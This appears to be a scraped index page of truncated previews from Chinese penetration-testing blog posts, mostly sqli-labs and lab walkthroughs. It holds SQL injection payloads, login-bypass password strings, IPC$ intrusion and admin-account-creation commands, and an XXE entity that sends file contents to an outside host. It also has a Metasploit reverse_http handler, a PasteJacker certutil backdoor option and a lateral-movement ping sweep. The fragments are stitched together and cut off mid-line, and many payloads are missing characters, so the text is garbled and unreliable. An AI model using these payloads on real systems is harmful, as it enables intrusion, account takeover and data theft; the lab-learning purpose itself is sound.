文章目录Less51、爆库2、查表3、差列4、查数据Less5
单引号闭合
?id1 and 12%23
?id1 and 12%23
?id1 order by 3%23
1、爆库
联合查询后发现没有回显
这里选择报错注入
?id1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) %23 2、查表
?id1 and up…
IPC$入侵的4种方式
1. 建立空连接
net use \\192.168.1.111\IPC$只要在建立空连接的命令最后添加del,即删除IPC$空连接的命令
2. 查看远程主机的当前时间
net time \\192.168.1.1113. 查看远程主机的共享资源
net view \\192.168.1.1114. 得到远程主机的NetBIO…
Less2
测试后发现没有单引号闭合
http://127.0.0.1:82/Less-2/?id1 order by 3%23
1、联合查询看回显
http://127.0.0.1:82/Less-2/?id-1 union select 1,2,3%23
http://127.0.0.1:82/Less-2/?id-1 union select 1,database(),user()%23
2、查表
http://127.0.0.1:82…
下面是记录了一些万能密码登录语句,一下均来自网络
数值型万能账号
a or true #
a or 1 #
a or 11 #
a or true – a
a or 1 – a
a or 11 – a
单引号字符型万能密码
a’ or true #
a’ or 1 #
a’ or 11 #
a’ or true --a
a’ or 1 – a
a’ or 11…
应急响应
What is
应急响应对应的英文是 Incident response或emergency responcse,通常是指一个组织为了应对各种意外事件的发生所做的准备以及在事件发生后所采取的措施。
当企业发生黑客入侵、系统崩溃货其他影响业务正常运行的安全时间是,急需第一时间进行处理,使企业…
一、信息收集
信息收集非常重要,有了信息才能知道下一步该如何进行,接下来将用 nmap 来演示信息收集
1、nmap 扫描存活 IP
由于本项目环境是 nat 模式需要项目 IP 地址,扫描挖掘本地的 IP 地址信息: 本机 IP 为:192…
Google HackingGoogleHacking作为常用且方便的信息收集搜索引擎工具,它是利用谷歌搜索强大,可以搜出不想被看到的后台、泄露的信息、未授权访问,甚至还有一些网站配置密码和网站漏洞等。掌握了Google Hacking基本使用方法,或许下一…
CS&MSF联动
CS联动MSF
现在CS这边已经成功上线一台主机,需要将这个会话传入MSF CS这边新建一个监听器 然后打开MSF
use exploit/multi/handler
set payload windows/meterpreter/reverse_http #需要设置成CS一样的payload
set lhost 192.168.109.128
set …
0x00:介绍
IMAP 就是 Internet Mail Access Protocol 的缩写翻译来就是邮件访问协议,也就是用来收邮件的(和它类似的还有个 POP3,也是用来收邮件的)。SMTP 就是 Simple Mail Transfer Protocol 的缩写翻译来就是邮件传…
0x00:介绍
SSI 是 Server Side Includes 的缩写,即服务端包含。我们都知道像后台语言 php、asp 等都有文件包含的函数 include,包含一些公共的函数库等。那么 html 也有这种包含的机制,我们可以把它叫做 SSI。SSI 还有一些使用情…
sql union 注入
一, 参数分类
根据可控参数的类型不同, 对注入类型分类:
1. 数字型select * from table where id1
2. 字符型select * from table where usernameroot
3. 搜索型select * from table where id like %root%
4. 关于注释:注入时, 在查询参数中使用注释需要url编…
XXE(xml外部实体注入)
XML External Entity
XXE介绍
XXE原理 建立*.dtd <!ENTITY % file SYSTEM "php://filter/readconvert.base64-encode/resourcefile:///c:/1.txt"> <!ENTITY % int "<!ENTITY % send SYSTEM http://192.168.0.105:8080?p…
漏洞描述
官方文档这样描述:OpenTSDB is a distributed, scalable Time Series Database (TSDB) written ontop of HBase;
翻译过来就是,基于Hbase的分布式的,可伸缩的时间序列数据库。
主要用途,就是做监控系统;譬如收集大规模集群(包括网络设备、操作系统、应用程序…
1. 背景 如果你想在一台windows机器上安装kali,用于渗透扫描,那么这篇文章不要错过。方法简单快速。
2. 软件准备
下载virtualbox
Downloads – Oracle VM VirtualBox
下载专门用于virtualbox的kali镜像
Get Kali | Kali Linux
3. virtualbox安装 …
文章目录Less9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)1、爆库2、爆表2.1、首先该数据库下判断表的数量2.2、判断表的长度2.3、爆表名3、爆字段3.1、判断有几列3.2、判断列长度3.3、判断列名4、查数据4.1、判断username列有几个数据4.2、判断数据…
文章目录0、系统语句1、order by 定字段2、判断字符类型3、判断回显位4、准备工作5、爆表6、从表中获取列名7、获取数据oracle,大型数据库,脚本语言一般是jsp,oracle对应端口1521oracle自带虚拟表dual,oracle的查询语句必须完整的…
Kali Linux安装中国蚁剑(AntSword)
下载地址:https://github.com/AntSwordProject/下载Linux64位的AntSword-Loader进入解压目录后,给执行权限:chmod ux AntSword进行安装前要创建空目录,最好是/usr/local…
一、Kali Linux 2 介绍与安装
1、Kali Linux 2 简介
Kali Linux 2是一个面向专业人士的渗透测试和安全审计的操作系统,它是由之前大名鼎鼎的Back Track系统发展而来。Back Track系统曾经是世界上非常优秀的渗透测试操作系统,取得了极大的成功。之后Off…
1、什么是csrf
CSRF(Cross Site Request Forgery),中文名称:跨站请求伪造,缩写为CSRF攻击者盗用了你的身份,以你的名义发送恶意请求CSRF是跨站请求伪造,不攻击网站服务器,而是冒充用…
提权概述
常用命令
whoami 查看当前用户名,用于查看权限大小
ipconfig 显示当前tcp/ip配置。用于查看ip
net user 查看当前系统的所有用户
net user 账号 密码 /add 创建用户
net loaclgroup administrators 账号 /add 将用户加入管理员组
tasklis…
分析代码 ① 从请求头中拿到Referer,并赋值给ComeUrl。 ② 判断ComeUrl是否为空,若是空,则表明是直接输入地址访问。本题不允许 ③ ComeUrl不为空, 读取Host,并在前面拼接 http:// 赋值给cUrl,如果ComeU…
sql 注入, union 联合注入
一, 参数分类
根据可控参数的类型不同, 对注入类型分类:
1. 数字型select * from table where id1
2. 字符型select * from table where usernameroot
3. 搜索型select * from table where id like %root%
4. 关于注释:注入时, 在查询参数中使用注…
XXE 外部实体注入
一, 简介
XXE(XML External Entity Injection)是一种 XML 注入攻击,它利用了 XML 解析器在处理 XML 文档时存在的漏洞。 攻击者通过在 XML 文档中插入外部实体的引用,可以引导 XML 解析器读取攻击者控制的外部…
Linux横向移动
主机存活探测
shell
for i in 192.168.111.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i is alived; fi; done
或者
for k in $( seq 1 255);do ping -c 1 192.168.1.$k|grep "ttl"|awk -F "[ :]" {print $4}; d…
君衍. 一、四十六关 ORDER BY数字型注入1、源码分析2、rand()盲注3、if语句盲注4、时间盲注5、报错注入6、Limit注入 二、四十七关 ORDER BY单引号报错注入1、源码分析2、报错注入3、时间盲注 三、四十八关 ODRER BY数字型盲注1、源码分析2、rand()盲注3、if语句盲注4、时间盲注…
君衍. 四十六关 ORDER BY数字型注入1、源码分析2、rand()盲注3、if语句盲注4、时间盲注5、报错注入6、Limit注入7、盲注脚本 四十六关 ORDER BY数字型注入
请求方式注入类型拼接方式GET报错、布尔盲注、延时盲注ORDER BY $id 我们直接可以从界面中得知传参的参数为SORT&#x…
简介
跨站脚本攻击(全称Cross Site Scripting,为和CSS(层叠样式表)区分,简称为XSS)是指恶意攻击者在Web页面中插入恶意javascript代码(也可能包含html代码),当用户浏览网页之时,嵌入其中Web里面…
微信公众号:乌鸦安全 扫取二维码获取更多信息! 影响版本:
Microsoft Exchange Server 2010 Service Pack 3
Microsoft Exchange Server 2013
Microsoft Exchange Server 2016
Microsoft Exchange Server 2019
漏洞介绍:
所…
文章目录XSS详解(一)一、概述二、XSS的分类2.1反射型XSS2.2存储型XSS2.3DOM型XSS三、常见XSS攻击向量四、xss测试流程图XSS详解(一)
一、概述
XSS(Cross Site Scripting)缩写为CSS,因易与层叠样式表CSS混淆ÿ…
网络应急响应流程及工作内容
What is
应急响应对应的英文是 Incident response或emergency responcse,通常是指一个组织为了应对各种意外事件的发生所做的准备以及在事件发生后所采取的措施。
当企业发生黑客入侵、系统崩溃货其他影响业务正常运行的安全时间是&a…
文章目录 端口扫描目录扫描文件上传漏洞利用查看用户爆破密码sudo提权flag位置FunboxEasyEnum writeup walkthrough
Funbox: EasyEnum ~ VulnHub
Enumeration
Brute-force the web server’s files and directories. Be sure to check for common file extensions.
Remote…
启动
PasteJacker [1] Windows
[2] Linux
[3] Exit第一次是让我们选择要攻击针对的目标系统,这里以Windows系统为例,即我自己的物理机
因此键入 1 ,回车 [1] Download and execute a msfvenom backdoor using certutil (Web delivery Past…
W13Scan介绍
W13scan 是基于Python3的一款开源的Web漏洞发现工具,它支持主动扫描模式和被动扫描模式,能运行在Windows、Linux、Mac上。 丰富的检测插件 使用
usage: w13scan [options]optional arguments:-h, --help show this help message and exit-…
靶机简介 Windows Server 2003是微软公司于2003年3月28日发布的服务器操作系统,它基于Windows XP/Windows NT 5.1进行开发,并在同年4月底上市。以下是关于Windows Server 2003的详细介绍: 系统名称与发布历程: 该产品最初被命名为…
要点
CAN总线释义:物理层结构,数据帧,数据交换,总线接口物理模块。一对Arduino CAN (Arduino C 处理)总线项目: 发送端发送随机数据,接收端接收并计算。发送端点动信号,…